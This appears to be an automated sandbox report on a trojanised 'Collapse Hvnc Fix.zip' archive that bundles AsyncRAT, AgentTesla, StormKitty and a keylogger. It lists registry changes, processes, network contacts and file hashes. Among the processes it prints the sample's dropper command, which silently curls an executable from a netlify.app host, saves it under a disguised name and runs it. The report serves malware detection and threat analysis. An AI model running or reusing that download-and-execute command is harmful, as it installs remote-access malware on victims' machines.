Malware Analysis Report

2025-01-03 06:30

Sample ID: 230923-ss7mlsgg7x
Target: Collapse Hvnc Fix.zip
SHA256: d3627b91410ec6ecfab993fb446ecabe7a77186707fb3e454a956a9cc1bad087
Tags: rat asyncrat agenttesla stormkitty s keylogger spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: d3627b91410ec6ecfab993fb446ecabe7a77186707fb3e454a956a9cc1bad087

Threat Level: Known bad

The file Collapse Hvnc Fix.zip was found to be: Known bad.

Malicious Activity Summary

rat asyncrat agenttesla stormkitty s keylogger spyware stealer trojan

Agenttesla family

AsyncRat

Async RAT payload

StormKitty payload

Stormkitty family

AgentTesla

Asyncrat family

AgentTesla payload

Executes dropped EXE

Checks computer location settings

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Enumerates system info in registry

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-23 15:25

Signatures

AgentTesla payload

Agenttesla family

agenttesla

Async RAT payload

rat

Asyncrat family

asyncrat

StormKitty payload

Stormkitty family

stormkitty

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-23 15:24

Reported

2023-09-23 15:43

Platform

win10v2004-20230915-en

Max time kernel

150s

Max time network

157s

Command Line

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix.zip"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AsyncRat

rat asyncrat

AgentTesla payload

Async RAT payload

rat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\Desktop\Client.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000007b7dda1e9be7d901c0393f219be7d9018e5da6239be7d90114000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Client.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 936 N/A C:\Users\Admin\Desktop\Client.exe C:\Windows\System32\cmd.exe
PID 936 wrote to memory of 3984 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix.zip"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\" -spe -an -ai#7zMap28299:114:7zEvent17349

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe

"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\Desktop\Client.exe

"C:\Users\Admin\Desktop\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe > "%TEMP%\aspnet_compiler.exe" & start /min "" "%TEMP%\aspnet_compiler.exe"

C:\Windows\system32\curl.exe

curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 57.72.67.172.in-addr.arpa udp
US 8.8.8.8:53 beautiful-genie-43cd26.netlify.app udp
US 44.217.161.11:443 beautiful-genie-43cd26.netlify.app tcp
US 8.8.8.8:53 11.161.217.44.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe

MD5 a2254ef4b20b21a3e1dcb7318217cadf
SHA1 8fb7e8e489f34968bf3bb26857208f392911b6d6
SHA256 3c2caf7af685cb69b81d9469afbbbb397ca4480f61c7363ea711c5a11781ed18
SHA512 bd6bf9d3fc86c830eb10f2456b15f8d4c3d3da154b8b9c80eed22e30275310b0820136e96cc2fe0e06a0f57be8a5dc1ec85fd7fd0d64b62de4bee3f4697b3ef0

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe.config

MD5 b8b7f83b3291d497e37b8117a59facf1
SHA1 677353bfafdcb73f194826f99b1450aa343ed40f
SHA256 a3ff6fdc656bb0a36df5e3da671cc649dc57a38cd8b9b0063c547bfd58b0c650
SHA512 87176764801f63b6102d0981f2e08b5f5cd5ba3c030196a25293cc9ee681acc8175adc6880248f579b91e28f503e6a237e94bd2c0cbef5d3ca44f692dddf7427

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Siticone.Desktop.UI.dll

MD5 1582aa45d981e0e569c6e05698642b30
SHA1 763506f312a186c55a04ef6a16ad7e867c394097
SHA256 21eecaf504b7fe787a45f4aa8f8f36dacfc3ab1d75624dfb41827cdef2a9a589
SHA512 278a7a4e2b9d82528200b9f92244db3f228187d15c36fd169deb927e343bc4d0bb29c9dba496f86558aea4f4deb44d1e47a41d5598c0b375d99ad9fbe99cec34

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Guna.UI2.dll

MD5 1915011997fdb9aa95f15e567f4e6070
SHA1 40a7853f14d6d4919279965f026d57cf9a104998
SHA256 952fa59d3d6d8c8c5fad8a1144e5effdf0fa92d58db1fb2a2899faf84c6273ab
SHA512 5cca71b42ed9dc154e6d5919e7cd93046168781a55c051818157848efc918b2e4dd92f422eb1c47e0940b645ba750facf83bce240748a8170ac8ce0afc9efa90

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\cGeoIp.dll

MD5 6d6e172e7965d1250a4a6f8a0513aa9f
SHA1 b0fd4f64e837f48682874251c93258ee2cbcad2b
SHA256 d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0
SHA512 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\ServerCertificate.p12

MD5 6ce85262afbc028314bdf6fe9aa718a5
SHA1 b59fe71c2ebd80df9e3ba5681ff6e36c90c2f0a8
SHA256 74eba079b36c835cd89af395cf53272c53351cd851efb140a8152410c4e2973e
SHA512 8ac1198de48c3acab03482958ccd5044561599373338f0bb9ff203c0d596b810143d420ebdcb20abd60a1383a08e70f7ddac6fa9b304a0a3a61aa06af030e6fb

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\dnlib.dll

MD5 5cc2bb48b5e8c8ac0b99669401d15456
SHA1 02e9ae08f3ec364834eb3ffc122f1c90e1b0e95e
SHA256 648950f725fb0320e09c52dcaf81764916df96dc62e7429ba67daea0acb784ea
SHA512 2867e94cee9f89f1cf85ad01083d75f4bc0bc0e551b2ffae05581828994f2b01a458ac7a7c94a45e8c40858ecce197f7ec23482ee13ef3f1bf82b33b89b3b420

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Stub\Client.exe

MD5 f5c75c1d8cdb213c46d6cb1e50178ac2
SHA1 7a60f6aca8b06c46518d26ae9f7c321f312816a7
SHA256 ff1593d664038b0c727f5a4772980f3dee659d315bbbf1b62b27c12696b42109
SHA512 0d602f4e9fbda3c9e219cf507917bae9527581d8d341d20523b3dcc756d9b2244485937bac793a16489fec4d22a618249009a515ed63ad1e25fd87308fbf3698

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Keylogger.exe

MD5 b8607b7921cd9cba78058fcb56bcfb9d
SHA1 1344f12ff7e23122b62fcc7f3be548c73d3c3efd
SHA256 b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c
SHA512 dd36040e57f2744437684e257caac0987a90deac0a60536f1cb8d690e256505d427931a3beb8d58f87c2c1bf5beb0a40c4b09417c451a07e5856044efbac1449

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\DevExpress.WinRTPresenter.Launcher.exe

MD5 de4449ac523ac31f66efe7f090360f71
SHA1 de7fcb8c16c7cab8255b8e31781efb0ffc45acce
SHA256 76a868948e5b4df73f5dab5606135f6bf10b598bdaa991737224edcb8fdd58db
SHA512 d43021c5878f08c38264e1882313959aa51b8dabf6649a64f476f3e7c0ba7fdaaac0f3edaa6fb3ea2e56889a5e78791236c1dfe8dbcd9218d7eab30a9ee4a56c

C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config

MD5 416afa3ab63684bfbb2fc0d627741358
SHA1 9a9daaf75cc63cabb33cdf9a21d2c55e72dfffef
SHA256 ae9bbbf6afc70f293f51fe103f9e8f65d5146eec86a20f3b746611549a065138
SHA512 742f19b3cb870c6e819449a285344358c3698d26519c2d151a24d1c13ce90cb5a452cb0b399969ce63546da3d0f5d5e012cc19ff9bc0ba0396f310c748ffe4d0

C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config

MD5 9f7263447a7147f27794207b622e7bed
SHA1 fb237d0308cd229b53ebdd1fac800c2d2e8eb0fb
SHA256 630731e94e34a01060cca637ea1bac6bec99bb7eaa4d747910e6cc166890149e
